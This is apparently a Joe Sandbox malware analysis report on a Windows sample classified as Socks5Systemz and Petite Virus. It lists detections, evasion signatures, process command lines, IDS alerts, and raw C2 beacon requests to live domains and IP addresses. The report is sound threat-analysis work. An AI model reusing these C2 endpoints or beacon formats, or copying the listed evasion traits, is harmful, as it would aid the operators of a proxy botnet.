Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AGcC2uK0El.exe

Overview

General Information

Sample name:AGcC2uK0El.exe
renamed because original name is a hash value
Original sample name:3ec3e60970e2d0d38df3b5e571e8514d.exe
Analysis ID:1575089
MD5:3ec3e60970e2d0d38df3b5e571e8514d
SHA1:e2c9975f6fda0cbbfaa434e25b6645450cb926ea
SHA256:113106967e66077d88c8cf6dae8170d74479b3c4f7a2fc284719eb39cef28ce8
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

Petite Virus, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Petite Virus
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
PE file has nameless sections
Uses schtasks.exe or at.exe to add and modify task schedules
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • AGcC2uK0El.exe (PID: 5512 cmdline: "C:\Users\user\Desktop\AGcC2uK0El.exe" MD5: 3EC3E60970E2D0D38DF3B5E571E8514D)
    • AGcC2uK0El.tmp (PID: 3356 cmdline: "C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmp" /SL5="$10480,7025884,54272,C:\Users\user\Desktop\AGcC2uK0El.exe" MD5: F448D7F4B76E5C9C3A4EAFF16A8B9B73)
      • schtasks.exe (PID: 6776 cmdline: "C:\Windows\system32\schtasks.exe" /Query MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • crtgame.exe (PID: 6544 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -i MD5: 3362BAC458070E33D0CABCDA1E4B735C)
      • net.exe (PID: 6620 cmdline: "C:\Windows\system32\net.exe" helpmsg 10 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 7064 cmdline: C:\Windows\system32\net1 helpmsg 10 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • crtgame.exe (PID: 7156 cmdline: "C:\Program Files (x86)\CRTGame\crtgame.exe" -s MD5: 3362BAC458070E33D0CABCDA1E4B735C)
  • cleanup
{"C2 list": ["gpatxul.com"]}
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\CRTGame\bin\x86\is-M07BP.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
    C:\Program Files (x86)\CRTGame\bin\x86\is-930UV.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
      C:\Program Files (x86)\CRTGame\bin\x86\is-6ND5B.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
        C:\Program Files (x86)\CRTGame\bin\x86\is-JORH4.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
          C:\Program Files (x86)\CRTGame\bin\x86\is-PJ8MN.tmpJoeSecurity_PetiteVirusYara detected Petite VirusJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            00000007.00000002.3300936901.0000000002C41000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
              00000007.00000002.3300804778.0000000002B9C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                Process Memory Space: crtgame.exe PID: 7156JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  No Sigma rule has matched
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T12:03:18.946257+010020494671A Network Trojan was detected192.168.2.54981894.232.249.18780TCP
                  2024-12-14T12:03:32.086598+010020494671A Network Trojan was detected192.168.2.54984994.232.249.18780TCP
                  2024-12-14T12:03:45.242156+010020494671A Network Trojan was detected192.168.2.54987994.232.249.18780TCP
                  2024-12-14T12:03:51.955829+010020494671A Network Trojan was detected192.168.2.549911185.237.206.12980TCP
                  2024-12-14T12:03:55.782950+010020494671A Network Trojan was detected192.168.2.549911185.237.206.12980TCP
                  2024-12-14T12:03:57.296460+010020494671A Network Trojan was detected192.168.2.549923185.237.206.12980TCP
                  2024-12-14T12:03:58.928983+010020494671A Network Trojan was detected192.168.2.549929185.237.206.12980TCP
                  2024-12-14T12:04:00.442523+010020494671A Network Trojan was detected192.168.2.549935185.237.206.12980TCP
                  2024-12-14T12:04:01.954791+010020494671A Network Trojan was detected192.168.2.549937185.237.206.12980TCP
                  2024-12-14T12:04:03.481805+010020494671A Network Trojan was detected192.168.2.549942185.237.206.12980TCP
                  2024-12-14T12:04:05.048266+010020494671A Network Trojan was detected192.168.2.549948185.237.206.12980TCP
                  2024-12-14T12:04:06.703781+010020494671A Network Trojan was detected192.168.2.549951185.237.206.12980TCP
                  2024-12-14T12:04:08.238263+010020494671A Network Trojan was detected192.168.2.549955185.237.206.12980TCP
                  2024-12-14T12:04:09.749286+010020494671A Network Trojan was detected192.168.2.549961185.237.206.12980TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-12-14T12:03:18.946257+010020494681A Network Trojan was detected192.168.2.54981894.232.249.18780TCP
                  2024-12-14T12:03:32.086598+010020494681A Network Trojan was detected192.168.2.54984994.232.249.18780TCP
                  2024-12-14T12:03:45.242156+010020494681A Network Trojan was detected192.168.2.54987994.232.249.18780TCP
                  2024-12-14T12:03:51.955829+010020494681A Network Trojan was detected192.168.2.549911185.237.206.12980TCP
                  2024-12-14T12:03:55.782950+010020494681A Network Trojan was detected192.168.2.549911185.237.206.12980TCP
                  2024-12-14T12:03:57.296460+010020494681A Network Trojan was detected192.168.2.549923185.237.206.12980TCP
                  2024-12-14T12:03:58.928983+010020494681A Network Trojan was detected192.168.2.549929185.237.206.12980TCP
                  2024-12-14T12:04:00.442523+010020494681A Network Trojan was detected192.168.2.549935185.237.206.12980TCP
                  2024-12-14T12:04:01.954791+010020494681A Network Trojan was detected192.168.2.549937185.237.206.12980TCP
                  2024-12-14T12:04:03.481805+010020494681A Network Trojan was detected192.168.2.549942185.237.206.12980TCP
                  2024-12-14T12:04:05.048266+010020494681A Network Trojan was detected192.168.2.549948185.237.206.12980TCP
                  2024-12-14T12:04:06.703781+010020494681A Network Trojan was detected192.168.2.549951185.237.206.12980TCP
                  2024-12-14T12:04:08.238263+010020494681A Network Trojan was detected192.168.2.549955185.237.206.12980TCP
                  2024-12-14T12:04:09.749286+010020494681A Network Trojan was detected192.168.2.549961185.237.206.12980TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: AGcC2uK0El.exeAvira: detected
                  Source: crtgame.exe.7156.7.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["gpatxul.com"]}
                  Source: AGcC2uK0El.exeVirustotal: Detection: 58%Perma Link
                  Source: AGcC2uK0El.exeReversingLabs: Detection: 55%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045C8A8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045C8A8
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045C95C ArcFourCrypt,1_2_0045C95C
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_0045C974 ArcFourCrypt,1_2_0045C974
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

                  Compliance

                  barindex
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeUnpacked PE file: 5.2.crtgame.exe.400000.0.unpack
                  Source: AGcC2uK0El.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: Binary string: X:\delphi\xrecode3\src\c\DLL\visualc\libmp4v2\bin\Windows-Win32\Release\libmp4v2.pdb source: is-ODQUV.tmp.1.dr
                  Source: Binary string: D:\lame-3.100-SVN-20200409\Dll\Win32\Release NASM\lame_enc.pdb source: is-GN0SC.tmp.1.dr
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_004520C0 FindFirstFileA,GetLastError,1_2_004520C0
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00473F08 FindFirstFileA,FindNextFileA,FindClose,1_2_00473F08
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00496568 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00496568
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00463404 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463404
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00463880 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463880
                  Source: C:\Users\user\AppData\Local\Temp\is-AA37T.tmp\AGcC2uK0El.tmpCode function: 1_2_00461E78 FindFirstFileA,FindNextFileA,FindClose,1_2_00461E78

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49818 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49818 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49849 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49849 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49879 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49955 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49935 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49935 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49879 -> 94.232.249.187:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49911 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49955 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49937 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49937 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49911 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49923 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49923 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49929 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49929 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49951 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49951 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49948 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49948 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49942 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.5:49961 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49942 -> 185.237.206.129:80
                  Source: Network trafficSuricata IDS: 2049468 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.5:49961 -> 185.237.206.129:80
                  Source: Malware configuration extractorURLs: gpatxul.com
                  Source: global trafficTCP traffic: 192.168.2.5:49914 -> 46.8.225.74:2023
                  Source: Joe Sandbox ViewASN Name: INT-PDN-STE-ASSTEPDNInternalASSY INT-PDN-STE-ASSTEPDNInternalASSY
                  Source: Joe Sandbox ViewASN Name: ITLDC-NLUA ITLDC-NLUA
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1Host: bmpkywz.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1Host: bmpkywz.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1Host: bmpkywz.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.225.74
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 194.49.94.194
                  Source: unknownUDP traffic detected without corresponding DNS query: 152.89.198.214
                  Source: unknownUDP traffic detected without corresponding DNS query: 81.31.197.38
                  Source: C:\Program Files (x86)\CRTGame\crtgame.exeCode function: 7_2_02C42B95 WSASetLastError,WSARecv,WSASetLastError,select,7_2_02C42B95
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1Host: bmpkywz.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1Host: bmpkywz.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1Host: bmpkywz.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f538166429e289d5b86953e226c55f676647fc2813369d184da3259568edc02f819c8 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficHTTP traffic detected: GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62cde24353e1d9a943e9d15038842955ee941e8a4a21bca13c034069638dc1a959a2220724aa021206497c02320899f8f71035f8edc05fd10c9dd5dbb20 HTTP/1.1Host: gpatxul.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                  Source: global trafficDNS traffic detected: DNS query: bmpkywz.com
                  Source: global trafficDNS traffic detected: DNS query: gpatxul.com
                  Source: crtgame.exe, 00000007.00000002.3299995322.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.129/
